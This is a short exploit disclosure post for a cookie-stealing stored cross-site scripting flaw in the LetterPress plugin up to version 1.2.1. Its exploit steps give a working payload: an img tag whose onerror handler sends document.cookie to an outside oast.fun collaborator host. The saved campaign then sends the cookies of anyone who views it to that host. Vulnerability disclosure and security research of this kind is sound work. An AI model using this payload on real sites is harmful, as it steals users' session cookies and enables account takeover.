LetterPress <= 1.2.1 - Cookie Stealing Vulnerability

By SANU P.L January 31, 2024 No Comments

Exploit Title: LetterPress <= 1.2.1 – Cookie Stealing Vulnerability
Exploit Author: P.L.Sanu
CVE:
CVSS:
References: https://github.com/plsanu/LetterPress-1.2.1-Cookie-Stealing-Vulnerability

Description:
In LetterPress plugin <= 1.2.1 is vulnerable to Cookie Stealing Vulnerability. An attacker can able to steal the cookies by injecting the JavaScript code.

Exploit:
1. In LetterPress plugin navigate to Add Campaign and insert the code “<img src=x onerror=”location.href=’https://masdctnkppwsmnzsddestjmlhih74l9tt.oast.fun?c=’+ document.cookie”>” in HTML Campaign Message input field and click on Save Campaign.
2. View the campaign and monitor the requests & responses in 3rd party site (Ex: burpcollaborator)
3. The cookies values are passed in the GET parameter of 3rd party site.

LetterPress <= 1.2.1 – Cookie Stealing Vulnerability

Vehicle Service Management System - 'Multiple' Cross-Site...

LetterPress <= 1.2.1 - Open Redirection Via...